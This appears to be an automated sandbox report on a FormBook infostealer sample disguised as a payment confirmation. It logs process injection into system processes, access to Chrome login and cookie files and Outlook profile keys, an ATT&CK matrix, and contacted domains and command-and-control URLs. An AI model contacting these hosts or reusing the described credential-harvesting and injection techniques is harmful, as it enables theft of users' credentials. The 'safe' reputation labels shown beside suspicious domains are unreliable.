            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtRequestWaitReplyPort: Direct from: 0x756F8D92Jump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtQueryVolumeInformationFile: Direct from: 0x774CFFAEJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtNotifyChangeKey: Direct from: 0x774D0F92Jump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtQueryAttributesFile: Direct from: 0x774CFE7EJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtReadVirtualMemory: Direct from: 0x774CFEB2Jump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtSetInformationFile: Direct from: 0x774CFC5AJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeNtQuerySystemInformation: Direct from: 0x774CFDD2Jump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeSection loaded: NULL target: C:\Windows\SysWOW64\RMActivate_ssp.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: NULL target: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: NULL target: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008Jump to behavior
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0131BE95 LogonUserW,0_2_0131BE95
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_012E374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,0_2_012E374E
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_01324B52 SendInput,keybd_event,0_2_01324B52
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_01327DD5 mouse_event,0_2_01327DD5
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payment confirmation 20240911.exe"Jump to behavior
            Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exeProcess created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0131B398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0131B398
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0131BE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0131BE31
            Source: xONxwdydvq.exe, 00000003.00000000.369892574.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp, xONxwdydvq.exe, 00000003.00000002.745713893.0000000000FA0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: Payment confirmation 20240911.exe, xONxwdydvq.exe, 00000003.00000000.369892574.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp, xONxwdydvq.exe, 00000003.00000002.745713893.0000000000FA0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: xONxwdydvq.exe, 00000003.00000000.369892574.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp, xONxwdydvq.exe, 00000003.00000002.745713893.0000000000FA0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
            Source: Payment confirmation 20240911.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_01307254 cpuid 0_2_01307254
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeQueries volume information: C:\Users\user\AppData\Local\Temp\n6jtxj_h.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeQueries volume information: C:\Users\user\AppData\Local\Temp\n6jtxj_h.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeQueries volume information: C:\Users\user\AppData\Local\Temp\n6jtxj_h.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeQueries volume information: C:\Users\user\AppData\Local\Temp\n6jtxj_h.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeQueries volume information: C:\Users\user\AppData\Local\Temp\n6jtxj_h.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeQueries volume information: C:\Users\user\AppData\Local\Temp\n6jtxj_h.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeQueries volume information: C:\Users\user\AppData\Local\Temp\n6jtxj_h.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeQueries volume information: C:\Users\user\AppData\Local\Temp\n6jtxj_h.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_013040DA GetSystemTimeAsFileTime,__aulldiv,0_2_013040DA
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_0135C146 GetUserNameW,0_2_0135C146
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_01312C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_01312C3C
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_012FE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_012FE47B
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.386010513.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.453167373.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.745450083.00000000003E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.745318015.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.386042260.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.745339267.0000000000280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.745411785.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.745725908.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.387128807.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior
            Source: Payment confirmation 20240911.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
            Source: Payment confirmation 20240911.exeBinary or memory string: WIN_81
            Source: Payment confirmation 20240911.exeBinary or memory string: WIN_XP
            Source: Payment confirmation 20240911.exeBinary or memory string: WIN_XPe
            Source: Payment confirmation 20240911.exeBinary or memory string: WIN_VISTA
            Source: Payment confirmation 20240911.exeBinary or memory string: WIN_7
            Source: Payment confirmation 20240911.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.386010513.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.453167373.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.745450083.00000000003E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.745318015.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.386042260.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.745339267.0000000000280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.745411785.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.745725908.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.387128807.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_013391DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_013391DC
            Source: C:\Users\user\Desktop\Payment confirmation 20240911.exeCode function: 0_2_013396E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_013396E2
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E293F4 sqlite3_mutex_leave,sqlite3_bind_blob,4_2_61E293F4
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E163D4 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,4_2_61E163D4
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E03203 sqlite3_bind_parameter_count,4_2_61E03203
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E03215 sqlite3_bind_parameter_name,4_2_61E03215
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E165F0 sqlite3_mutex_enter,sqlite3_mutex_leave,sqlite3_transfer_bindings,4_2_61E165F0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E295F7 sqlite3_bind_null,sqlite3_mutex_leave,4_2_61E295F7
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E295D1 sqlite3_bind_int,sqlite3_bind_int64,4_2_61E295D1
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E29582 sqlite3_bind_int64,sqlite3_mutex_leave,4_2_61E29582
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E2951D sqlite3_bind_double,sqlite3_mutex_leave,4_2_61E2951D
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E294F6 sqlite3_bind_text16,4_2_61E294F6
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E29489 sqlite3_bind_text64,4_2_61E29489
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E29462 sqlite3_bind_text,4_2_61E29462
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E6C43E sqlite3_mprintf,sqlite3_bind_int,4_2_61E6C43E
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E2941B sqlite3_bind_blob64,4_2_61E2941B
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E297F9 sqlite3_bind_zeroblob64,sqlite3_mutex_enter,sqlite3_bind_zeroblob,sqlite3_mutex_leave,4_2_61E297F9
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E29712 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,4_2_61E29712
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E6C6C1 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v3,sqlite3_free,sqlite3_bind_value,4_2_61E6C6C1
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E296A5 sqlite3_bind_zeroblob,sqlite3_mutex_leave,4_2_61E296A5
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E29628 sqlite3_bind_pointer,sqlite3_mutex_leave,4_2_61E29628
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_61E12CD9 sqlite3_bind_parameter_index,4_2_61E12CD9

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		3
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		5
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Browser Session Hijacking            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS128
            System Information Discovery            		Distributed Component Object Model1
            Email Collection            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets15
            Security Software Discovery            		SSH21
            Input Capture            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts212
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNC3
            Clipboard Data            		Multiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
            Remote System Discovery            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1509210 Sample: Payment confirmation 20240911.exe Startdate: 11/09/2024 Architecture: WINDOWS Score: 100 35 www.kxshopmr.store 2->35 45 Suricata IDS alerts for network traffic 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 6 other signatures 2->51 10 Payment confirmation 20240911.exe 3 2->10         started        signatures3 process4 signatures5 59 Writes to foreign memory regions 10->59 61 Maps a DLL or memory area into another process 10->61 13 svchost.exe 10->13         started        process6 signatures7 63 Maps a DLL or memory area into another process 13->63 16 xONxwdydvq.exe 13->16 injected process8 dnsIp9 29 www.kckartal.xyz 16->29 31 www.golbasi-nakliyat.xyz 16->31 33 18 other IPs or domains 16->33 39 Maps a DLL or memory area into another process 16->39 41 Found direct / indirect Syscall (likely to bypass EDR) 16->41 20 RMActivate_ssp.exe 1 20 16->20         started        signatures10 43 Performs DNS queries to domains with low reputation 31->43 process11 dnsIp12 37 www.sqlite.org 45.33.6.223, 49162, 80 LINODE-APLinodeLLCUS United States 20->37 27 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32 20->27 dropped 53 Tries to steal Mail credentials (via file / registry access) 20->53 55 Tries to harvest and steal browser information (history, passwords, etc) 20->55 57 Maps a DLL or memory area into another process 20->57 25 firefox.exe 20->25         started        file13 signatures14 process15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Payment confirmation 20240911.exe32%ReversingLabs
            Payment confirmation 20240911.exe33%VirustotalBrowse
            Payment confirmation 20240911.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\sqlite3.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            hm62t.top2%VirustotalBrowse
            bola88site.one0%VirustotalBrowse
            freepicture.online1%VirustotalBrowse
            www.qiluqiyuan.buzz1%VirustotalBrowse
            natroredirect.natrocdn.com0%VirustotalBrowse
            www.726075.buzz1%VirustotalBrowse
            www.freepicture.online1%VirustotalBrowse
            www.bola88site.one0%VirustotalBrowse
            www.318st.com0%VirustotalBrowse
            www.monos.shop0%VirustotalBrowse
            www.hm62t.top2%VirustotalBrowse
            www.kxshopmr.store0%VirustotalBrowse
            www.mfgamecompany.shop0%VirustotalBrowse
            www.sqlite.org0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.golbasi-nakliyat.xyz/k2vl/0%Avira URL Cloudsafe
            http://www.mizuquan.top0%Avira URL Cloudsafe
            http://www.bola88site.one/3lkx/0%Avira URL Cloudsafe
            http://www.sqlite.org/2018/sqlite-dll-win32-x86-3220000.zip0%Avira URL Cloudsafe
            http://www.mfgamecompany.shop/lwt6/0%Avira URL Cloudsafe
            http://www.kckartal.xyz/h5qr/0%Avira URL Cloudsafe
            http://www.mfgamecompany.shop/lwt6/?OlTXe=j/d5AuZ+qvKLIrA4zUrVw+2CrkvGu2Abkvu2bg8Q1qFMmFYyV0FqVOqh+5a/W0db1sjnIOHkeiKnBLtde7l1JWY97ka7LeQptngAefCJEWxKZG7LUP9THac9rEGk&th=XXRlJ20%Avira URL Cloudsafe
            http://www.mizuquan.top/ed2j/?OlTXe=HnYP2yoU4dt40olvIGC5RoskYevTXTgkbcmGMLslyKV8dFp2SGuaPRuUt3ufihjdd5fzvgaawU7CuzqToCbPCdeTlZwsuBv/uVCwYl9sd7doy+RVtoqpun8fEj8V&th=XXRlJ20%Avira URL Cloudsafe
